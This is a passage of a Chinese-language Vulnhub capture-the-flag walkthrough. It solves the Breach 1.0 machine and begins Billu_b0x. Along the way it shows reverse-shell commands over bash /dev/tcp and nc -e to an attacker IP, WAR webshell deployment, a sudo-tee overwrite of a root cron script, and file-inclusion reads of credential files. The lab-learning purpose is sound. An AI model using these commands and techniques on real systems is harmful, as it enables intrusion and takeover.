这是一个impresscms登录页</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用之前两次base64解码得到的密码登录impresscms:</p><p>用户名:<code>pgibbons</code></p><p>密码:<code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) exploit-db.com查找impress cms漏洞:发现ImpressCMS 1.3.9 SQL注入漏洞:<code>https://www.exploit-db.com/exploits/39737/</code>,可注入页面为<code>/modules/profile/admin/field.php</code>,但是该页面目前没有权限访问,无法进行注入。</p><p>(4) 注意左边的收件箱Inbox显示有3封邮件,依次打开看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>第1封邮件,主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第2封邮件,主要内容:Michael采购了IDS/IPS。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(5) 访问<code>http://192.168.110.140/.keystore</code>下载包含SSL证书的密钥库keystore文件,keystore是存储公私密钥的一种文件格式。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /> </p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03:导入流量抓包文件、SSL证书到Wireshark</h3><p>(1) 依次访问左边的菜单树,点击每个菜单栏:</p><p>content链接了一张图片troll.gif:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>点击profile会进入目录浏览:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>但都没发现可利用漏洞,继续浏览每个网页。</p><p>(2) 点击<code>View Account</code>菜单进入界面,再依次点击页面的<code>Content</code>,会弹出一行链接<code>Content SSL implementation test capture</code>,点击链接,如下图:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(3) 进入<code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>页面,可以看到一个名为:<code>_SSL_test_phase1.pcap</code>的Wireshark流量包文件,下载它。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>同时,该页面有重要的提示信息:这个pCAP文件是有红色团队的重新攻击产生的,但是不能读取文件。而且<code>They told me the alias, storepassword and keypassword are all set to 'tomcat'</code>别名、Keystore密码、key密码都设置成<code>tomcat</code>。</p><p>由此推测:a.这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码;b.系统中可能存在tomcat。</p><p>(4) Windows攻击机安装有JDK,到JDK目录下找到keytool.exe工具:路径<code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书,命令<code>keytool -list -keystore c:\keystore</code> 输入密钥库口令tomcat:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:</p><p>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) 将.p12证书导入Wireshark</p><p>.p12证书存储在C盘根目录,将证书导入Wireshark:在Wireshark中打开<code>_SSL_test_phase1.pcap</code>流量包文件,选择菜单:编辑--首选项--Protocols--SSL,点击右边的Edit:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>输入:192.168.110.140 8443 http 点击选择证书文件 输入密码tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04:从流量包文件中得到tomcat后台URL和密码</h3><p>(1) 导入证书后,https流量已经被解密,查看每个http流量包:</p><p>发现从192.168.110.129到192.168.110.140的攻击流量包,其中有cmd命令马执行了id命令,攻击者上传了两张图片,疑似图片马,但是命令马无法直接访问,需要登录tomcat后台:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 获得Tomcat后台登录地址和用户名密码</p><p>继续观察流量包,发现一个Unauthorized的认证包,该request和response包含了Tomcat后台的登录地址:<code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现包含登录用户名密码的数据包, 采用http basic认证,认证数据包为:<code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这是base64编码的用户名密码,将<code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code>复制到Burpsuit Decoder进行解码,得到Tomcat登录用户名密码</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat后台登录用户名:tomcat,密码:Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>获取shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05: 登录Tomcat后台get shell</h3><p>(1) 登录tomcat后台:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Tomcat后台get shell是有标准姿势的,上养马场,准备好jsp版本的各种马,这里有cmd命令小马,菜刀马,jspspy大马,将其打成caidao.zip压缩包,再将zip压缩包将扩展名改为caidao.war,将war包上传部署即可:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在WAR file to deploy中将war包上传:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>上传后在目录中找到上传的目录/caidao,已上传jsp木马文件就在这个目录下。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用中国菜刀连接<code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用菜刀命令行连接,执行id;pwd命令成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。</p><h2><a name='header-n7231' class='md-header-anchor '></a>提升权限</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06: 查看系统用户,发现mysql root密码</h3><p>(1) 查看当前系统用户,找id为1000以后的用户 cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现两个值得关注的用户:milton 和 blumbergh</p><p>(2) 在菜刀里面找到网页根目录,默认是在tomcat目录,找到网页部署目录<code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 该目录下发现两个奇怪的php文件,命名非常长且无规律fe4db1f7bc038d60776dcb66ab3404d5.php和0d93f85c5061c44cdffeb8381b2772fd.php,使用菜刀下载下来打开查看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这是mysql数据库连接文件,使用mysql的root账号连接数据库,密码为空。</p><p>(4) 因为菜刀马总是被删除,所以反弹shell到nc:在菜刀cmd命令行反弹一个shell到Windows攻击机的nc,命令:<code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反弹sehll成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 连接mysql数据库,查看mysql用户,这里输入mysql命令后一直没有回显,直到输入exit退出mysql登录后,查询回显才出来,命令:</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到milton用户的密码哈希:<code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>到<code>https://www.somd5.com/</code>解密,得到用户milton的明文密码:thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07: 提权到用户milton和blumbergh</h3><p>(1) 无法执行su命令,显示需要一个终端,之前都遇到这个问题,通过Python解决:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 提权到用户milton</p><p><code>su - milton</code>  密码:thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p> 查看milton用户home目录下的some_script.sh文件,没有可利用的信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看系统内核版本,命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>系统内核版本为:Linux Breach 4.2.0-27-generic,不存在Ubuntu本地提权漏洞。存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看历史命令,无有价值的线索,看到历史命令su提权到了blumbergh用户。需要找到blumbergh用户的密码。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 到现在发现了7张图片,6张在图片目录:<code>http://192.168.110.140/images/</code>,1张在milton用户目录下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>milton用户目录下my_badge.jpg</code></p><p>将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>找到可能的密码或提示:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现唯一的单词是:<code>coffeestains</code></p><p>或者使用exiftool.exe工具查看bill.png图片的exif信息,得到可能的密码:<code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)提权到blumbergh用户</p><p>用户名:blumbergh <br/></p><p>密码:coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7)查看历史命令,发现/usr/share/cleanup和tidyup.sh脚本文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>读取tidyup.sh脚本分析:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。</p><p>查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看sudo权限,执行sudo -l:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现用户能够以root权限执行这tee程序或tidyup.sh脚本:/usr/bin/tee和/usr/share/cleanup/tidyup.sh</p><p>tee命令用于读取标准输入的数据,并将其内容输出成文件。tidyup.sh是清理脚本。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x07:反弹root权限shell,获取flag</h3><p>(1) 向tidyup.sh中写入反弹shell命令</p><p>tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令:</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt</code></p><p>再使用tee命令将shell.txt内容输出到tidyup.sh</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>查看tidyup.sh文件写入成功:</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) nc监听等待反弹shell,查看权限是root,flag是一张图片,将图片拷贝到home目录:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看一下crontab计划任务,发现果然有每3分钟执行tidyup.sh清理脚本的任务:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用之前上传的jsp大马JspSpy将flair.jpg下载到Windows:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 查看flag:<code>I NEED TO TALK ABOUT YOUR FLAIR</code> 游戏通关。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>思路总结</h2><h3><a name='header-n7404' class='md-header-anchor '></a>主要突破点</h3><p>(1) 从网页源码和图片字符中解密出CMS和Tomcat的账号、密码。</p><p>(2) 导入ssl证书到Wireshark中解密经过SSL加密的流量,获得Tomcat后台登录URL和账号密码。</p><p>(3) Tomcat后台get shell姿势要熟练。</p><p>(4) 提权:找到两个账号的密码,发现可以root权限执行的tee命令和tidyup.sh清理脚本,通过计划任务反弹root shell。</p><h3><a name='header-n7413' class='md-header-anchor '></a>难点和踩到的坑</h3><p>(1) 使用keytool导出SSL证书:这是非常规渗透知识,需要查阅原理和工具使用,耗费时间较多。</p><p>(2) Tomcat后台get shell后,已上传的菜刀马总是被杀,每次传上去过不了几分钟没了,当时以为该系统安装了杀毒软件或web shell清理工具,实际是因为主机tidyup.sh清理脚本,每3分钟清理一次。反弹出一个shell就可以持续使用shell了。</p><p>(3) 连接mysql执行命令,没有回显。菜刀执行命令超时,nc中只有exit退出时才回显,当时打算放弃了,才exit退出,结果退出才有回显,发现了milton账号的密码哈希。山重水复疑无路,柳暗花明又一村。</p><p>(4) 花费较多时间进行两次账号切换,再反弹root shell提权。发现和利用tidyup.sh需要较多时间。</p><p>(5) 通过crontab的计划任务,反弹root shell的方式,在真实渗透测试中是常见的,比如redis的root空口令挖矿,可以ssh证书连接,也可以写root crontab反弹,但是在Vulnhub中第一次遇到,对初学者有难度。</p><h1><a name='header-n7424' class='md-header-anchor '></a>第二节 Billu_b0x</h1><h2><a name='header-n7425' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n7426' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor '></a>靶机说明</h3><p>虚拟机难度中等,使用ubuntu(32位),其他软件包有: </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>目标</h3><p>Boot to root:从Web应用程序进入虚拟机,并获得root权限。</p><h3><a name='header-n7445' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。</li><li>攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>信息收集</h2><ul><li>ip发现</li></ul><p>启动Billu_b0x虚拟机,由于虚机网络设置为net模式,使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP,即可找到虚机IP,命令:</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>获得靶机ip <code>192.168.64.161</code></p><ul><li>端口和服务识别</li></ul><p>使用nmap扫描1-65535全端口,并做服务识别和深度扫描(加-A参数),扫描结果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现目标主机端口和服务如下:</p><p>端口         协议        后端服务</p><p>TCP 22      SSH        OpenSSH 5.9p1</p><p>TCP 80      HTTP       Apache httpd 2.2.22     <br/></p><p>进入web首页:发现用户名口令输入框,并提示“Show me your SQLI skills”。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>漏洞挖掘思路:</li></ul><p>(1) SQL注入:首页提示注入,想办法注入成功。</p><p>(2) 暴破目录:用DirBuster暴破,看是否有新网页,找新漏洞;</p><p>(3) 漏洞扫描:暴破的新网页,送进AWVS或APPScan扫漏洞;</p><p>(4) 手动挖掘:暴破的新页面,通过Firefox挂burp代理,在burp中观察Request和Response包,手动找漏洞;</p><p>(5) 查看每个网页的源码,看是否有提示;。</p><p>(6) 如得到用户名,密码,尝试登录ssh,如能连接上,无需反弹shell了。</p><ul><li>步骤1:测试首页SQL注入</li></ul><p>(1) 在用户名输入框输入<code>admin' or 'a'='a --</code> 密码随意,发现无法注入,出现js弹框Try again:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sqlmap进行post注入测试,命令:</p><p>sqlmap.py -u “<a href='http://192.168.64.161' target='_blank' class='url'>http://192.168.64.161</a>” --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap注入检测完成,结果无法注入,目前不知道系统对注入的过滤规则是什么,使用几个sqlmap的tamper测试也未成功。暂时先不fuzz注入,看看暴破目录。</p><ul><li>步骤2:windows使用DirBuster暴破目录,同时使用kali Linux的dirb暴破,为得到更多的暴破结果,并减少暴破时间:</li></ul><p>得到页面较多,test.php、add.php、in.php、c.php、index.php、show.php等,目录有:uploaded_images,phpmy依次访问:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤3:利用文件包含漏洞获取php源码、passwd文件</li></ul><p>(1) 访问test.php:页面提示file参数为空,需要提供file参数</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>测试文件包含:<code>http://192.168.64.161?file=/etc/passwd</code> 发现无法包含,跳转会首页。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在Firefox的Hackbar或者Brupsuit中,将get请求,变更为post请求,文件包含成功,获得passwd文件。</p><p>使用hackerbar post数据,可下载passwd文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用burpsuit中选择Change request method,将get请求转换为post请求,获得passwd文件成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 通过同样文件包含的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以访问文件的同时,审计文件的源代码。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤4:访问add.php、in.php页面和审计代码</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。</p><ul><li>步骤5:查看c.php源码</li></ul><p>这是数据库连接文件,发现mysql连接用户名密码:</p><p>用户名:billu</p><p>密码:b0x_billu</p><p>数据库名:ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤6:通过得到的mysql密码登录phpmyadmin失败</li></ul><p>(1) 通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用mysql密码尝试登录phpmyadmin:可是无法登录。目前得到一个ssh用户是ica,mysql连接账号billu和密码b0x_billu,尝试登录ssh和phpmyadmin都失败。</p><p>目前SQL注入绕过没有成功,得到的mysql连接密码无法登录phpmyadmin。</p><p>初步推测虚拟机故障:mysql没有正常启动,稍后打算单用户模式进入Ubuntu排查。</p><ul><li>步骤7:继续暴破phpmy目录,文件包含phpmyadmin配置文件</li></ul><p>(1) phpmyadmin的默认的配置文件是:config.inc.php。需要猜测路径,通过URL猜测路径默认在/var/www/phpmy下面。</p><p>(2) 在火狐浏览器的Hackbar或者Burpsuit中,通过文件包含,读取config.inc.php文件,Hackbar的获取方法:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在配置文件中发现root密码:roottoor</p><p>(3) Burpsuit的获取方法:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步骤8:使用xshell ssh登录root账号,完成实验</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步骤9:排查mysql故障</li></ul><p>至此已经获得root权限,但是之前的phpmyadmin无法登录问题,怀疑mysql故障,root登录后,查看mysql状态为:mysql stop/waiting,推测mysql被之前的高线程目录暴破、扫描导致故障,尝试重启mysql失败,决定重新安装虚拟机。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>虚机重新安装后,ssh登录,查看mysql运行状态正常,但是新虚机的IP变成:192.168.64.162。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步骤10:回到步骤6,通过得到的mysql密码登录phpmyadmin</li></ul><p>用户名:billu,密码:b0x_billu,登录成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在<code>ica_lab</code>数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /> </p><h2><a name='header-n7650' class='md-header-anchor '></a>获取shell</h2><ul><li>步骤11:登录index首页,并获得cmd shell和反弹shell</li></ul><p>(1) 使用web密码登录首页,大小写必须一样。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' 